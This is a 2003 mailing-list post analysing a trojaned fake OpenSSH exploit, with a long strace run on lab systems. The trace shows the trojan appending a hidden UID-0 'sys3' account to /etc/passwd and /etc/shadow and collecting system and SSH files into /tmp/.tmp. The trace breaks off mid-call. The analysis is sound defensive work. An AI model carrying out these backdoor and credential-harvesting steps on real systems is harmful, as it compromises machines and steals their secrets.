Lars,

What you say is true. For those of you who are interested, attached is an strace of this bogus exploit, which I ran in my lab on disposable systems on a captive network. The traces show that the binary sends only a few bytes to the target's sshd, while a local child shell running as root appends a UID-0 account ("sys3") to /etc/passwd and /etc/shadow, collects the ifconfig output, /etc/passwd, /etc/shadow and known_hosts into /tmp/.tmp, and pipes that file to sendmail. Note: in the parent PID file I edited out quite a bit of repetitive bogus wait statements; no sense in filling your mailboxes with 400k lines of crap.

...

Chris

On Fri, 2003-09-19 at 03:07, Lars Olsson wrote:
> On Fri, 19 Sep 2003, Vitaly Osipov wrote:
>
> > This means that the original poster (gordon last) made it up himself,
> > because he is saying :
> >
> > >> > i looked at this piece of exploit... it is binary so i'm not sure if
> > >> > this is a trojan or a backdoor or a virus. but i can't see anything
> > >> > strange while sniffing the exploit traffic. and i got root on several
> > >> > of my openbsd boxes with that. the bruteforcer seems to be very good.
> >
> > which is obviously not true. Btw as far as I understand, the trojan code is
> > triggered when
> > the "exploit" is run with the offset specified, and not in a "bruteforcing"
> > mode.
> >
>
> The trojan seems to be triggered in both cases, provided that the
> "bruteforcing" terminates. I haven't test run the code but I did a very
> quick reverse of the binary. It connects to the remote sshd but only
> sends the key used for descrambling the trojan code while it pretends
> to search for offsets.
>
>
> /Lars

--
Christopher Neitzert http://www.neitzert.com/~chris
execve("./theosshucksass", ["./theosshucksass", "192.168.0.34"], [/* 20 vars */]) = 0 uname({sys="Linux", node="f00f", ...}) = 0 brk(0) = 0x804a450 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000 open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0 old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40017000 close(3) = 0 open("/lib/tls/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0 old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x42000000 old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x12f000) = 0x4212f000 old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000 close(3) = 0 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000 set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 munmap(0x40017000, 31716) = 0 brk(0) = 0x804a450 brk(0x804b450) = 0x804b450 brk(0) = 0x804b450 brk(0x804c000) = 0x804c000 fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(4, 1), ...}) = 0 ioctl(1, SNDCTL_TMR_TIMEBASE, {B38400 opost isig icanon echo ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 write(1, "theosshucksass.c - remote openss"..., 59) = 59 write(1, "by raazab/m0nkeyhack@supermarkt."..., 35) = 35 getuid32() = 0 write(1, "\nr00ting box...\n", 16) = 16 write(1, "\thost: 192.168.0.34\n", 20) = 20 write(1, "\toffset: (null)\n\n", 17) = 17 write(1, "[*] building socket\n", 20) = 20 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 write(1, "[*] connecting to victim\n", 25) = 25 connect(3, 
{sa_family=AF_INET, sin_port=htons(22), sin_addr=inet_addr("192.168.0.34")}, 16) = 0 recv(3, "SSH-1.99-OpenSSH_3.5p1\n", 255, 0) = 23 write(1, "\tVictim: SSH-1.99-OpenSSH_3.5p1\n", 32) = 32 write(1, "\n", 1) = 1 write(1, "[*] no offset given: brute force"..., 63) = 63 write(1, "\tTrying 0xe56ac71c\t", 19) = 19 write(3, "gdfea#\0", 7) = 7 write(1, ":-/\n", 4) = 4 write(1, "\tTrying 0xe56ac720\t", 19) = 19 write(3, "gdfea#\0", 7) = 7 write(1, ":-/\n", 4) = 4 write(1, "\tTrying 0xe56ac724\t", 19) = 19 write(3, "gdfea#\0", 7) = 7 write(1, ":-/\n", 4) = 4 write(1, "\tTrying 0xe56ac728\t", 19) = 19 write(3, "gdfea#\0", 7) = 7 write(1, ":-/\n", 4) = 4 write(1, "\tTrying 0xe56ac72c\t", 19) = 19 write(3, "gdfea#\0", 7) = 7 write(1, ":-/\n", 4) = 4 write(1, "\tTrying 0xe56ac730\t", 19) = 19 write(3, "gdfea#\0", 7) = 7 write(1, ":-/\n", 4) = 4 write(1, "\tTrying 0xe56ac734\t", 19) = 19 write(3, "gdfea#\0", 7) = 7 write(1, ":-/\n", 4) = 4 write(1, "\tTrying 0xe56ac738\t", 19) = 19 write(3, "gdfea#\0", 7) = 7 write(1, ":-/\n", 4) = 4 write(1, "\tTrying 0xe56ac73c\t", 19) = 19 write(3, "gdfea#\0", 7) = 7 write(1, ":-)\n", 4) = 4 write(1, "[*] Gotcha!\n", 12) = 12 write(1, "[*] reconnecting \n", 18) = 18 close(3) = 0 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 write(1, "[*] connecting to victim\n", 25) = 25 connect(3, {sa_family=AF_INET, sin_port=htons(22), sin_addr=inet_addr("192.168.0.34")}, 16) = 0 recv(3, "SSH-1.99-OpenSSH_3.5p1\n", 255, 0) = 23 write(1, "\tVictim: SSH-1.99-OpenSSH_3.5p1\n", 32) = 32 write(1, "\n", 1) = 1 write(1, "[*] calculating nops\n", 21) = 21 write(1, "[*] sending nops\n", 17) = 17 write(3, "\220\220\220\220\220\220\220\220\220\220\220\220\220\220"..., 23) = 23 write(1, "[*] sending shellcode\n", 22) = 22 pipe([4, 5]) = 0 vfork() = 1062 close(5) = 0 write(3, "\210", 1) = 1 write(1, "[*] trying to spawn remote shell"..., 47) = 47 write(3, "gdfea#", 6) = 6 write(1, "[*] closing socket\n\n", 20) = 20 close(3) = 0 write(1, "all seems fine... 
try to connect"..., 63) = 63 munmap(0x40017000, 4096) = 0 exit_group(0) = ?
--- SIGSTOP (Stopped (signal)) @ 0 (0) --- --- SIGSTOP (Stopped (signal)) @ 0 (0) --- close(4) = 0 dup2(5, 1) = 1 close(5) = 0 execve("/bin/sh", ["sh", "-c", "(echo \"sys3:x:0:103::/:/bin/sh\" "...], [/* 20 vars */]) = 0 uname({sys="Linux", node="f00f", ...}) = 0 brk(0) = 0x80e5b54 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000 open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0 old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000 close(4) = 0 open("/lib/libtermcap.so.2", O_RDONLY) = 4 read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\r\0"..., 512) = 512 fstat64(4, {st_mode=S_IFREG|0755, st_size=11784, ...}) = 0 old_mmap(NULL, 14856, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x4001f000 old_mmap(0x40022000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x2000) = 0x40022000 close(4) = 0 open("/lib/libdl.so.2", O_RDONLY) = 4 read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30"..., 512) = 512 fstat64(4, {st_mode=S_IFREG|0755, st_size=15900, ...}) = 0 old_mmap(NULL, 13176, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40023000 old_mmap(0x40026000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x2000) = 0x40026000 close(4) = 0 open("/lib/tls/libc.so.6", O_RDONLY) = 4 read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512 fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0 old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000 old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000 old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000 close(4) = 0 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40027000 set_thread_area({entry_number:-1 -> 6, base_addr:0x40027660, 
limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 munmap(0x40017000, 31716) = 0 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = 4 close(4) = 0 brk(0) = 0x80e5b54 brk(0) = 0x80e5b54 brk(0x80e6000) = 0x80e6000 open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0 mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40028000 close(4) = 0 brk(0) = 0x80e6000 brk(0x80e7000) = 0x80e7000 brk(0) = 0x80e7000 brk(0x80e8000) = 0x80e8000 getuid32() = 0 getgid32() = 0 geteuid32() = 0 getegid32() = 0 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 brk(0) = 0x80e8000 brk(0x80e9000) = 0x80e9000 time(NULL) = 1063931038 brk(0) = 0x80e9000 brk(0x80ea000) = 0x80ea000 open("/etc/mtab", O_RDONLY) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=264, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 read(4, "/dev/hdb2 / ext3 rw 0 0\nnone /pr"..., 4096) = 264 close(4) = 0 munmap(0x40017000, 4096) = 0 open("/proc/meminfo", O_RDONLY) = 4 fstat64(4, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 read(4, " total: used: free:"..., 1024) = 653 close(4) = 0 munmap(0x40017000, 4096) = 0 brk(0) = 0x80ea000 brk(0x80eb000) = 0x80eb000 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0 uname({sys="Linux", node="f00f", ...}) = 0 stat64("/root/theothisisourpresentforyou", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0 stat64(".", {st_mode=S_IFDIR|0700, 
st_size=4096, ...}) = 0 getpid() = 1062 getppid() = 1 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0 stat64("/usr/local/sbin/sh", 0xbffff1b0) = -1 ENOENT (No such file or directory) stat64("/usr/local/bin/sh", 0xbffff1b0) = -1 ENOENT (No such file or directory) stat64("/sbin/sh", 0xbffff1b0) = -1 ENOENT (No such file or directory) stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=626028, ...}) = 0 access("/bin/sh", X_OK) = 0 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=626028, ...}) = 0 access("/bin/sh", X_OK) = 0 getpgrp() = 1060 rt_sigaction(SIGCHLD, {0x8076d30, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 brk(0) = 0x80eb000 brk(0x80ec000) = 0x80ec000 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 open("/usr/lib/gconv/gconv-modules.cache", O_RDONLY) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=21040, ...}) = 0 mmap2(NULL, 21040, PROT_READ, MAP_SHARED, 4, 0) = 0x40017000 close(4) = 0 brk(0) = 0x80ec000 brk(0x80ed000) = 0x80ed000 brk(0) = 0x80ed000 brk(0x80ee000) = 0x80ee000 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1063 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0 rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0 wait4(-1,
--- SIGSTOP (Stopped (signal)) @ 0 (0) --- --- SIGSTOP (Stopped (signal)) @ 0 (0) --- getpid() = 1063 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0 rt_sigaction(SIGCHLD, {0x8076d30, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {SIG_DFL}, 8) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4 dup2(4, 1) = 1 close(4) = 0 dup2(1, 2) = 2 open("/etc/passwd", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4 fcntl64(1, F_GETFD) = 0 fcntl64(1, F_DUPFD, 10) = 10 fcntl64(1, F_GETFD) = 0 fcntl64(10, F_SETFD, FD_CLOEXEC) = 0 dup2(4, 1) = 1 close(4) = 0 write(1, "sys3:x:0:103::/:/bin/sh\n", 24) = 24 dup2(10, 1) = 1 fcntl64(10, F_GETFD) = 0x1 (flags FD_CLOEXEC) close(10) = 0 open("/etc/shadow", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 4 fcntl64(1, F_GETFD) = 0 fcntl64(1, F_DUPFD, 10) = 10 fcntl64(1, F_GETFD) = 0 fcntl64(10, F_SETFD, FD_CLOEXEC) = 0 dup2(4, 1) = 1 close(4) = 0 write(1, "sys3:$1$nWXmkX74$Ws8fX/MFI3.j5HK"..., 59) = 59 dup2(10, 1) = 1 fcntl64(10, F_GETFD) = 0x1 (flags FD_CLOEXEC) close(10) = 0 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1064 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0 rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0 wait4(-1, 
[WIFEXITED(s) && WEXITSTATUS(s) == 0], 0, NULL) = 1064 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 --- SIGCHLD (Child exited) @ 0 (0) --- wait4(-1, 0xbfffec34, WNOHANG, NULL) = -1 ECHILD (No child processes) sigreturn() = ? (mask now []) rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [], SA_RESTORER, 0x420276f8}, 8) = 0 open("/root/", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 4 fstat64(4, {st_mode=S_IFDIR|0750, st_size=4096, ...}) = 0 fcntl64(4, F_SETFD, FD_CLOEXEC) = 0 brk(0) = 0x80ee000 brk(0x80f0000) = 0x80f0000 getdents64(4, /* 30 entries */, 4096) = 1008 getdents64(4, /* 0 entries */, 4096) = 0 close(4) = 0 stat64("/root/.ssh", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0 lstat64("/root/.ssh/known_hosts", {st_mode=S_IFREG|0644, st_size=1541, ...}) = 0 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0 stat64("/usr/local/sbin/cat", 0xbfffeec0) = -1 ENOENT (No such file or directory) stat64("/usr/local/bin/cat", 0xbfffeec0) = -1 ENOENT (No such file or directory) stat64("/sbin/cat", 0xbfffeec0) = -1 ENOENT (No such file or directory) stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0 access("/bin/cat", X_OK) = 0 stat64("/bin/cat", {st_mode=S_IFREG|0755, st_size=14364, ...}) = 0 access("/bin/cat", X_OK) = 0 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1065 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0 rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0 wait4(-1, [WIFEXITED(s) && WEXITSTATUS(s) == 0], 0, NULL) = 1065 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 --- SIGCHLD (Child exited) @ 0 (0) --- wait4(-1, 0xbfffecd4, WNOHANG, NULL) = -1 ECHILD (No child processes) sigreturn() = ? 
(mask now []) rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [], SA_RESTORER, 0x420276f8}, 8) = 0 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0 stat64("/usr/local/sbin/find", 0xbfffef60) = -1 ENOENT (No such file or directory) stat64("/usr/local/bin/find", 0xbfffef60) = -1 ENOENT (No such file or directory) stat64("/sbin/find", 0xbfffef60) = -1 ENOENT (No such file or directory) stat64("/bin/find", 0xbfffef60) = -1 ENOENT (No such file or directory) stat64("/usr/sbin/find", 0xbfffef60) = -1 ENOENT (No such file or directory) stat64("/usr/bin/find", {st_mode=S_IFREG|0755, st_size=51028, ...}) = 0 access("/usr/bin/find", X_OK) = 0 stat64("/usr/bin/find", {st_mode=S_IFREG|0755, st_size=51028, ...}) = 0 access("/usr/bin/find", X_OK) = 0 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1066 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0 rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0 wait4(-1, [WIFEXITED(s) && WEXITSTATUS(s) == 1], 0, NULL) = 1066 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 --- SIGCHLD (Child exited) @ 0 (0) --- wait4(-1, 0xbfffed74, WNOHANG, NULL) = -1 ECHILD (No child processes) sigreturn() = ? 
(mask now []) rt_sigaction(SIGINT, {0x8085950, [], SA_RESTORER, 0x420276f8}, {0x8075db0, [], SA_RESTORER, 0x420276f8}, 8) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0 pipe([4, 5]) = 0 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [CHLD], 8) = 0 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1067 rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8) = 0 close(5) = 0 close(5) = -1 EBADF (Bad file descriptor) rt_sigprocmask(SIG_BLOCK, [INT CHLD], [CHLD], 8) = 0 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|0x11, <ignored>, <ignored>, 0x400276a8) = 1068 rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8) = 0 close(4) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [CHLD], 8) = 0 rt_sigprocmask(SIG_SETMASK, [CHLD], NULL, 8) = 0 rt_sigprocmask(SIG_BLOCK, [CHLD], [CHLD], 8) = 0 rt_sigaction(SIGINT, {0x8075db0, [], SA_RESTORER, 0x420276f8}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0 wait4(-1,
--- SIGSTOP (Stopped (signal)) @ 0 (0) --- --- SIGSTOP (Stopped (signal)) @ 0 (0) --- getpid() = 1064 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGINT, {SIG_DFL}, {0x8085950, [], SA_RESTORER, 0x420276f8}, 8) = 0 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x8076d30, [], SA_RESTORER, 0x420276f8}, 8) = 0 open("/tmp/.tmp", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4 dup2(4, 1) = 1 close(4) = 0 execve("/sbin/ifconfig", ["/sbin/ifconfig", "-a"], [/* 19 vars */]) = 0 uname({sys="Linux", node="f00f", ...}) = 0 brk(0) = 0x8055fe8 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000 open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=31716, ...}) = 0 old_mmap(NULL, 31716, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40017000 close(4) = 0 open("/lib/tls/libc.so.6", O_RDONLY) = 4 read(4, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220W\1"..., 512) = 512 fstat64(4, {st_mode=S_IFREG|0755, st_size=1536292, ...}) = 0 old_mmap(0x42000000, 1261416, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x42000000 old_mmap(0x4212f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 0x12f000) = 0x4212f000 old_mmap(0x42132000, 8040, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42132000 close(4) = 0 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001f000 set_thread_area({entry_number:-1 -> 6, base_addr:0x4001f280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 munmap(0x40017000, 31716) = 0 brk(0) = 0x8055fe8 brk(0x8056fe8) = 0x8056fe8 brk(0) = 0x8056fe8 brk(0x8057000) = 0x8057000 open("/usr/lib/locale/locale-archive", 
O_RDONLY|O_LARGEFILE) = 4 fstat64(4, {st_mode=S_IFREG|0644, st_size=30301680, ...}) = 0 mmap2(NULL, 2097152, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40020000 close(4) = 0 uname({sys="Linux", node="f00f", ...}) = 0 access("/proc/net", R_OK) = 0 access("/proc/net/unix", R_OK) = 0 socket(PF_UNIX, SOCK_DGRAM, 0) = 4 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 5 access("/proc/net/if_inet6", R_OK) = -1 ENOENT (No such file or directory) access("/proc/net/ax25", R_OK) = -1 ENOENT (No such file or directory) access("/proc/net/nr", R_OK) = -1 ENOENT (No such file or directory) access("/proc/net/rose", R_OK) = -1 ENOENT (No such file or directory) access("/proc/net/ipx", R_OK) = -1 ENOENT (No such file or directory) access("/proc/net/appletalk", R_OK) = -1 ENOENT (No such file or directory) access("/proc/sys/net/econet", R_OK) = -1 ENOENT (No such file or directory) access("/proc/sys/net/ash", R_OK) = -1 ENOENT (No such file or directory) access("/proc/net/x25", R_OK) = -1 ENOENT (No such file or directory) open("/proc/net/dev", O_RDONLY) = 6 fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 read(6, "Inter-| Receive "..., 1024) = 569 read(6, "", 1024) = 0 close(6) = 0 munmap(0x40017000, 4096) = 0 open("/usr/share/locale/locale.alias", O_RDONLY) = 6 fstat64(6, {st_mode=S_IFREG|0644, st_size=2601, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 read(6, "# Locale name alias data base.\n#"..., 4096) = 2601 brk(0) = 0x8057000 brk(0x8058000) = 0x8058000 read(6, "", 4096) = 0 close(6) = 0 munmap(0x40017000, 4096) = 0 open("/usr/share/locale/en_US.UTF-8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en_US.utf8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en_US/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory) 
open("/usr/share/locale/en.UTF-8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en.utf8/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en/LC_MESSAGES/net-tools.mo", O_RDONLY) = -1 ENOENT (No such file or directory) ioctl(5, 0x8912, 0xbffff240) = 0 open("/proc/net/dev", O_RDONLY) = 6 fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 read(6, "Inter-| Receive "..., 1024) = 569 close(6) = 0 munmap(0x40017000, 4096) = 0 ioctl(5, 0x8913, 0xbffff1e0) = 0 ioctl(5, 0x8927, 0xbffff1e0) = 0 ioctl(5, 0x891d, 0xbffff1e0) = 0 ioctl(5, 0x8921, 0xbffff1e0) = 0 ioctl(5, 0x8970, 0xbffff1e0) = 0 ioctl(5, 0x8970, 0xbffff1e0) = 0 ioctl(5, 0x8942, 0xbffff1e0) = 0 ioctl(5, 0x8915, 0xbffff1e0) = -1 EADDRNOTAVAIL (Cannot assign requested address) open("/usr/lib/gconv/gconv-modules.cache", O_RDONLY) = 6 fstat64(6, {st_mode=S_IFREG|0644, st_size=21040, ...}) = 0 mmap2(NULL, 21040, PROT_READ, MAP_SHARED, 6, 0) = 0x40017000 close(6) = 0 fstat64(1, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4001d000 open("/proc/net/if_inet6", O_RDONLY) = -1 ENOENT (No such file or directory) open("/proc/net/dev", O_RDONLY) = 6 fstat64(6, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, 